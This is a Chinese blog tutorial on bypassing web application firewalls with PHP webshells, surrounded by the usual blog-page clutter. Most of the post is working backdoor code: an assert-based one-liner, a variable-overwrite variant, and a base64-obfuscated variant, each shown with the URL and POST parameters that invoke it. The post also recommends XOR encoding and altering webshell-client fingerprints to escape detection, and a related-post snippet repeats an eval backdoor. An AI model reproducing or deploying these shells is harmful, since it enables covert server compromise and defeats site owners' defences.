(48.3)【WAF绕过-代码】变量覆盖、加密混淆、异或生成、造轮子

最新推荐文章于 2023-04-10 21:44:14 发布
最新推荐文章于 2023-04-10 21:44:14 发布
阅读量429 收藏 11
点赞数 4
分类专栏: 0X01【web安全】从0到1 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/124872861
版权

目录

一、变量覆盖

1.1、原理:

1.2、原型:

1.3、变量覆盖:

1.4、URL传参

二、加密混淆

2.1、原理:

2.2、shell文件

2.3、加密

2.4、URL传参

2.5、加密混淆工具

三、异或生成

3.1、原理:

3.2、网址:

四、造轮子

4.1、原因:

4.2、方法一:

4.3、方法二:

一、变量覆盖

1.1、原理:

把敏感字符传递的参数中,waf能够确定你的代码,但是确定不了你传递的参数值

safedog有变量追踪

简单拆分的话,扫描会直接报马的

1.2、原型:

<?php assert($_POST['z'])?>

1.3、变量覆盖:

<?php
$a = $_GET['x'];
$$a = $_GET['y'];
$b($_POST['z']);

//?x=b&y=assert
//$a = b
//$$a ->$b 变量引用
//$b= assert
//$b($_POST['z']);--->assert($_POST['z'])

?>

1.4、URL传参

URL/1.php?x=b&y=assert

-----------------

(post提交)

z=phpinfo();

二、加密混淆

2.1、原理:

基于关键字的匹配过滤规则

上传一个附带对应的解密方法,然后上传经过对应加密的执行语句

2.2、shell文件

shell.php

<?php
$a = $_GET['x'];
$$a = $_GET['y'];
$b(base64_decode($_POST['z']));
?>

2.3、加密

对要执行的语句加密

2.4、URL传参

URL/1.php?x=b&y=assert

(post提交)

z=cGhwaW5mbygpOw==

2.5、加密混淆工具

【WAF绕过-加密混淆】php代码加密混淆icon-default.png?t=M4ADhttps://blog.csdn.net/qq_53079406/article/details/124874012?spm=1001.2014.3001.5501

三、异或生成

3.1、原理:

定义:两个值相同时,返回false,否则返回true

XOR有一个特点:如果对一个值连续做两次 XOR,会返回这个值本身。

最适合用于简易加解密运算

原理是:数A和数B进行异或运算生成数C,如果将C和B进行异或运算则C又会还原为A

3.2、网址:

异或运算加密/解密 - 一个工具箱 - 好用的在线工具都在这里! (atoolbox.net)icon-default.png?t=M4ADhttp://www.atoolbox.net/Tool.php?Id=857

四、造轮子

4.1、原因:

菜刀、蚁剑、冰蝎的指纹在WAF都有,使用会被识别拦截

4.2、方法一:

修改工具的特征信息

4.3、方法二:

自己写数据包,就不会有指纹特征,就能实现相应的功能

黑色地带(崛起)
关注
  • 4
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
生成器小软件
01-24
功能:加空格,去空格,字节形式,长度计算,或计算 适合hex报文分析
LJM304-M305_U_Full_WebPack_48.3.4530.exe
05-06
LJM304-M305_U_Full_WebPack_48.3.4530.exe
第48天-WAF 绕过-权限控制之代码混淆及行为轮子
MCTSOG的博客
04-11 980
思维导图 Safedog 代码层手写及脚本绕过 变量覆盖加密混淆生成 BT Aliyun 代码层手写及脚本绕过 编码解码(变量覆盖加密混淆生成) ASP,PHP,ASPX,JSP,PY 等后门免杀同理 一句话后门的原理: <?php@eval($_POST['password']) ?> @再php中含义为后面如果执行错误不会报错 eval()函数表示括号里的语句全做代码执行 $_POST[‘password’]`表示从页面中以post方式获取变量password的值。
变量覆盖漏洞
chaojixiaojingang
08-13 1431
变量覆盖漏洞 变量覆盖指的是可以用我们自定义的参数值替换程序原有的变量值,变量覆盖漏洞通常需要结合程序的其他功能来实现完整攻击。 变量覆盖漏洞大多由函数使用不当导致,经常引发变量覆盖的漏洞有:extract()函数和parse_str() 函数,import_request_variables()函数则是用在没有开启全局变量注册的时候,调用了这个函数则相当于开启了全局变量注册。另外部分应用利用$...
WAF攻防-权限控制&代码免杀&或运算&变量覆盖&混淆加密&传参
今天是几号的博客
04-10 503
# 基础-脚本后门控制原理-代码解释 对比工具代码-菜刀&蚁剑&冰蝎&哥斯拉等 # 原理-脚本后门查杀机制-函数&行为 对比WAF规则-函数匹配&工具指纹等 # 代码-脚本后门免杀变-覆盖&传参
【最小生成树】密文
weixin_44111457的博客
09-01 629
【题目描述】 有一串长度为n的密文,密文的每一位都可以用一个非负整数来描述,并且每一位都有一个权值ai。你可以进行任意多次操作,每次操作可以选择连续一段密文,花费选择的所有位上权值的或和的代价获得这段密文每一位的或和。求至少需要花费多少代价才能将密文的每一位都破解出来。 【输入】 第一行一个正整数n。 第二行n个非负整数,表示ai。 【输出】 输出一个整数,表示答案。 【样例输入】 2 1 3...
PyPI 官网下载 | aliyun-log-python-sdk-0.6.48.3.tar.gz
01-26
此SDK版本为0.6.48.3,可以从PyPI(Python Package Index)官网下载。PyPI是Python社区广泛使用的软件包仓库,提供各种Python模块和库的下载,方便开发者集成到自己的项目中。 这个SDK的主要功能包括: 1. **创建...
2.90-inch-EPD-Specification-HINK-E029A01.rar
09-09
1. 尺寸与分辨率:HINK-E029A01是一款2.90英寸的显示模块,其物理尺寸为48.3mm x 32.8mm。分辨率通常为200x200像素,提供清晰的图像显示能力,适合小型可穿戴设备或物联网设备的界面展示。 2. 显示模式:HINK-E029...
Linear新推20dB增益宽带差分放大器LTC6430-20
01-20
该器件提供了A级版本,这版本100%经过测试,保证+44.8dBm的OIP3,在380MHz时典型值为+48.3dBm。其增益保证 19.6dB值和22.1dB值。而B级版本在同样频率时提供典型值为+46.3dBm的OIP3。  LTC6430-20非常适合在低失真、...
compat-libstdc++-33_3.2.3-48.3_i386.deb
03-25
libstdc++5.so丢失后的补丁 <br>
串口数据或校验码生成
11-14
如24 4D 73 67……等等数据输入后,自动计算或校验和
一些绕过waf的笔记
大方子
08-31 966
本文主要是总结了WAF绕过的各种方法,大家在测试中可以使用以下的方法进行WAF绕过,希望对大家有帮助。 文章转载的,可能格式不太好看,大家凑合着看吧。 一、各种编码绕过 1、URL编码 ?id=1 union select pass from admin limit 1 ?id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73...
生成树(树形dp)
Harris-H的博客
05-24 688
生成树(树形dp) 传送门 题意:给定nnn个结点的权值ai∈[1,127]a_i\in[1,127]ai​∈[1,127].求最大或和生成树。 思路:答案的范围为[0,127][0,127][0,127].考虑树形dpdpdp, 设dp[i][j]dp[i][j]dp[i][j]为以结点iii为根的子树答案是否为jjj 对于当前结点uuu,遍历所有的子结点vvv ,有转移方程:dp[u][i⊕j] ∣=dp[u][i]&dp[v][j]dp[u][i\oplus j]\ |=dp[
Github标星5.2k+!开源、强大的WAF(web防火墙)VeryNginx!
民工哥的博客
03-08 2059
「读者福利!2 TB 各类技术资源免费赠送」之前工作中经常在 Nginx 里面配置各种规则,感觉 Nginx 功能强大但并不是很易用。于是就觉得可以写一个强大而且对人类友好的 Ngi...
或(XOR)运算加密/解密在线工具
热门推荐
WP8HUB
11-24 5万+
或(XOR)运算加密/解密在线工具,工具链接:http://www.atoolbox.net/Tool.php?Id=857 或(XOR)运算加密一种简单高效、非常安全的加密方法。 或(XOR)运算: 逻辑运算之中,除了 AND 和 OR,还有一种 XOR 运算,中文称为"或运算"。 它的定义是:两个值相同时,返回false,否则返回true。也就是说,XOR可以用来判断...
按位生成新的32位整数
qq_37667464的博客
11-21 696
输入一个32位的整数a,使用按位或^运算,生成一个新的32位整数b,使得该整数b的每一位等于原整数a中该位左右两边两个bit位的或结果 方法1: #include &lt;stdio.h&gt; int fun(); int fun(int a) { int b=0; int i; for(i=1;i&lt;32;i++) { if((i==1)||(i==32)) { ...
IP地址hash-移位或Hash函数和素数乘法Hash函数
DaisyChioa的专栏
11-20 4963
在系统实现中,我们多处用到Hash表,如连接的查找和虚拟服务的查找。选择Hash表优先Tree等复杂数据结构的原因是Hash表的插入和删除的复杂度为O(1),而Tree的复杂度为O(log(n))。Hash表的查找复杂度为O(n/m),其中n为Hash表中对象的个数,m为Hash表的桶个数。当对象在Hash表中均匀分布和Hash表的桶个数与对象个数一样多时,Hash表的查找复杂度可以接近O(1)。
#include <iostream>using nanespace std;#def ine MAXSIZE 20 //顺序表的最大长度 typedef struct int key: char *otherinfo;} ElemType: //顺序表的存储结构typedef struct ElemLype *工, //存储空间的基地址 int length; //顺序表长度 }Salist: //顺序表类型 void ShellInsert (Sglist &L, int dk) //对顺序表L做一趟增里是d:的希尔插入排序int i, j: for (i=dk+1;i<=L. length:++i) if (L.r[i].key<L.r [i-dk].key) //for L.r[0]=L.r[i] : for (j=i-dk;j>0 &8L.r[0]. key<L.r[j].key:j-dk)L.r[j+dk]=L.r[0] 1/ellInsert void ShellSort(SaList &L,int dt[],int t)l1/H48.3 //按增里序列dt [0..t-1]对顺序表L作F趟希尔排序intk: for (k=0;k<t:++k) 1 ShellInsert (L, dt[k]): 11-趟增里为at[t]的希尔插入排序//ShellSort void Create_ Sq(SqList &L) int i,n: cout<<"请输入数据个数,不超过”<MLAXSIZE<<"个。"<<end1 ;ciny)n: //4↑tl cout<<"请输入待排序的数据: \n2 : vhile (n>MАХЅІZЕ) cout<<"个数超过上限,不能超过”LAXSIE <<",请重新输入"<<end1:cinn: for(i=1;i(=n;itt) cin>L. r[i].key:L. lengthHt; void show(SqList L) for(i-l;i<=L. length;i++)out«L.r[i]. keyKendl iThFmain ( )
最新发布
06-13
这段代码是一个希尔排序的实现,其中包括了一个顺序表的定义和创建,以及希尔排序的具体实现。顺序表的结构体包括了一个元素的键值和其他信息,以及表的长度等属性。希尔排序是一种插入排序的改进,通过将数据按一定...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值